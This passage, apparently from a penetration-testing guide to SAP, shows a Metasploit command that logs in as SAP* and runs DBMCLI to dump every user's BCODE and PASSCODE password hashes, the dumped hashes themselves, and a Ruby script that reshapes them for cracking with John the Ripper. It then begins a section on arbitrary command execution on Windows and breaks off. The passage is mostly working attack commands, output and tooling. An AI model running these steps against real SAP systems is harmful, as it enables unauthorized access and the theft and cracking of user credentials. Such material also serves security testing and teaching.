[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Below, the module executes the DBMCLI command to connect to the database using the keys stored in .XUSER.62 (-U c and -USQL DEFAULT name stored keys, not passwords). No credentials are supplied because the OS user owns the .XUSER.62 file and is therefore a ‘trusted’ user as far as MaxDB is concerned.

The SQL statement executed extracts the BCODE and PASSCODE hashes for all users across all clients. As with the sap_rfc_usr02 output, these can be cracked with John the Ripper.

./msfcli auxiliary/scanner/sap/sap_rfc_sxpg_command_exec RHOSTS=172.16.252.135 RPORT=3342 USER=SAP* PASS=06071992 CLIENT=001 CMD=DBMCLI OS=1 PARAM="-d NPL -U c -USQL DEFAULT sql_execute select mandt, bname, bcode, passcode from usr02" E

[+] 172.16.252.135:3342 [SAP] Successful login - 001:SAP*:06071992
[+] Command Executed: DBMCLI -d NPL -U c -USQL DEFAULT sql_execute select mandt, bname, bcode, passcode from usr02

[SAP] Command Exec
==================

Output
------
000;DDIC;x'61D26428640DBAB5';x'905F5E6CE67B7C60D0F7BA9C4063AAF0D8602B45'
000;SAP*;x'D0BFF4276DA1E208';x'8948310AF768FA9061598E8F68FD144CE65B7480'
000;SAPCPIC;x'7D806C248F03813D';x'0000000000000000000000000000000000000000'
000;TMSADM;x'942B9DC0F2394D85';x'C9AA19DA354DC8397D7AC8EA8B4C04DF49CB58FF'
001;ADSUSER;x'7FE24F5321515E7F';x'CD83AD9E92B4E37E2255FEA11AC82234BA825FBD'
001;ADS_AGENT;x'8C32369322B732F6';x'FE0DD787EE7EBCBF4728BDC1A865A6F15B064611'
001;DDIC;x'61D26428640DBAB5';x'905F5E6CE67B7C60D0F7BA9C4063AAF0D8602B45'
001;DEVELOPER;x'C4C768AEB4A99EF5';x'4BD353A8F1D8B453D58910CC87D24B0C1C9A9011'
001;J2EE_ADMIN;x'6C1541BC997289D1';x'149E781A80383CC59AB04E88B51832819403364F'
001;J2EE_GUEST;x'0000000000000000';x'0000000000000000000000000000000000000000'
001;SAP*;x'D0BFF4276DA1E208';x'8948310AF768FA9061598E8F68FD144CE65B7480'
001;SAPCPIC;x'7D806C248F03813D';x'0000000000000000000000000000000000000000'
001;SAPJSF;x'7D6762BFB7504CA4';x'93738A70AA83C6DAA6CD0B3B1853986333A29192'
066;EARLYWATCH;x'BD5E494D3ECBF5E2';x'0000000000000000000000000000000000000000'
066;SAP*;x'29B60B2614510C1D';x'789C6E939E7BD99A554D79ABC214910A502EE407'
END
OK

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
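Both the sap_rfc_usr02 listing earlier and the DBMCLI output above need reshaping before John the Ripper will take them. The following added example (not one of the MWR modules) parses either format and emits john input for the two hash types: BCODE is the older CODVN B hash (john --format=sapb) and PASSCODE the SHA1-based CODVN F/G hash (john --format=sapg). Both formats take USERNAME$HASH; padding the user name with spaces to 40 characters is the form older john builds require and is an assumption you should check against your john version. All-zero values, as shown for SAPCPIC, EARLYWATCH and J2EE_GUEST above, mean no hash of that kind is stored and are skipped. The sample text is a constructed copy of the two outputs.

```ruby
# Added example, not one of the MWR modules: convert the hash listings that
# sap_rfc_usr02 and the DBMCLI command print into John the Ripper input.
# BCODE -> CODVN B (john format sapb), PASSCODE -> CODVN F/G (john format
# sapg). The USERNAME$HASH form with the name padded to 40 characters is an
# assumption to check against your john version. The sample text is a
# constructed copy of the two outputs shown in the article.

USR02_TABLE = <<~TXT
  MANDT Username BCODE PASSCODE
  ----- -------- ----- --------
  000 SAPCPIC 7D806C248F03813D 0000000000000000000000000000000000000000
  001 J2EE_GUEST 0000000000000000 0000000000000000000000000000000000000000
  001 SAP* D0BFF4276DA1E208 8948310AF768FA9061598E8F68FD144CE65B7480
TXT

DBMCLI_OUTPUT = <<~TXT
  000;DDIC;x'61D26428640DBAB5';x'905F5E6CE67B7C60D0F7BA9C4063AAF0D8602B45'
  066;EARLYWATCH;x'BD5E494D3ECBF5E2';x'0000000000000000000000000000000000000000'
  END
  OK
TXT

# One row of the msfcli table: client, user, 16 hex chars, 40 hex chars.
TABLE_ROW  = /\A(\d{3})\s+(\S+)\s+([0-9A-F]{16})\s+([0-9A-F]{40})\z/
# One row of the DBMCLI output, with the hex quoted as x'...'.
DBMCLI_ROW = /\A(\d{3});([^;]+);x'([0-9A-F]{16})';x'([0-9A-F]{40})'\z/

# Return [client, user, bcode, passcode] for every recognised line; header,
# separator and END/OK lines match neither pattern and are dropped.
def parse_hash_lines(text)
  text.each_line.map do |raw|
    line = raw.strip
    m = line.match(TABLE_ROW) || line.match(DBMCLI_ROW)
    m && m.captures
  end.compact
end

# An all-zero value means no hash of that kind is stored for the user.
def empty_hash?(hex)
  hex.delete('0').empty?
end

# Build john input per format. A user present in several clients with the
# same hash produces one line, since the hash does not depend on the client.
def john_lines(rows)
  out = { sapb: [], sapg: [] }
  rows.each do |_client, user, bcode, passcode|
    label = user.upcase.ljust(40)
    out[:sapb] << "#{label}$#{bcode}" unless empty_hash?(bcode)
    out[:sapg] << "#{label}$#{passcode}" unless empty_hash?(passcode)
  end
  out.transform_values(&:uniq)
end
```

Write each list to its own file and run john with --format=sapb and --format=sapg respectively; the CODVN B hash is the weaker of the two and is the one to start with.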

1.3. Arbitrary Command Execution

On Windows systems, configured commands that accept additional parameters can be manipulated to execute arbitrary commands. Notice the command